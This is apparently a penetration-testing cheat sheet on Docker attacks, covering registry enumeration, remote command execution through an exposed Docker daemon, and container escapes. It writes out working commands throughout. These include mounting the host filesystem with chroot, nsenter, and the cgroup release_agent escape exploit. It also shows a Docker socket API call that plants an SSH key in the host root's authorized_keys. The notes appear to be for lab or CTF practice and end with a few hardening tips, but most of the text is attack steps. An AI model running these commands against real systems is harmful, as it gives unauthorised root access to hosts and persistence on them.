4.2 KiB
4.2 KiB
Docker Vulnerabilities
Abusing Registry
- Registry Doc
- Registry is a json API endpoint
- Private registry added in
/etc/docker/daemon.json
- Can be found by nmap as a service
Enumeration
- General query
curl http://test.com:5000/v2/_catalog`
- List tags
curl http://test.com:5000/v2/<REPO>/<APP>/tags/list
history
section of the json object contains commands executed at build phase. May contain sensitive data like passwords.
curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
Reversing Docker Images
dive <IMAGE-ID>
Uploading Images to Registry
- Ever image has a
latest
tag - Upload modified docker image as
latest
- Article
RCE via Exposed Docker Daemon
-
Users inside the
docker
group may open tcp socket through docker -
nmap -sV -p- <IP> -vv
to find exposed tcp sockets via docker -
Confirming via
curl http://test.com:2375/version
on open docker port -
Execute commands on socket
docker -H tcp://test.com:2375 ps docker -H tcp://test.com:2375 exec <container> <cmd>
Escape Container via Exposed Docker Daemon
- Looking for exposed docker sockets
find / -name "*sock"
groups
- Mount the host volume and chroot to it, need alpine image.
docker images
```sh
```sh
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
or
docker run -v /:/host --rm -it <imageID> chroot /host/ bash
Shared Namespaces
-
Namespaces
-
Cgroups
-
OverlayFS
-
Requires root inside the container
-
Execute command
nsenter --target 1 --mount sh
Misconfiguration
- Privileged container connect to the host directly, not through the docker engine
- Execution of bins on the host from libs inside the container is possible
capsh --print
-
man capabilities
-
Exploit
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/exploit" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /exploit
echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit
chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
Check fdisk
fdisk -l
andlsblk
, host bulk device may be exposed- Mount the device
mkdir /mnt/hostdev
mount /dev/<hostVda> /mnt/hostdev
Creating a Container from inside another container
- Needs root inside a container
- Upload static curl
- Check available images and containers
curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/containers/json
curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/images/json
- Inside the container as root
curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock http://localhost/containers/create -d '{"Detach":true,"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"Image":"<imagename>:latest","HostConfig":{"Binds": ["/:/var/tmp"]},"Cmd":["sh", "-c", "echo <ssh-key> >> /var/tmp/root/.ssh/authorized_keys"]}'
- Return value is the ID
- Start a container
curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
- Login in to the host via ssh
Dirty c0w
https://github.com/dirtycow/dirtycow.github.io
runC
Securing a Container
- Least Privileges
- Seccomp
- Securing Registry via TLS
Checking if you are inside a container
- Low process count
ps aux
.dockerenv
in/
cd / && ls -lah
- cgroups contain docker names
pwd /proc/1
cat cgroups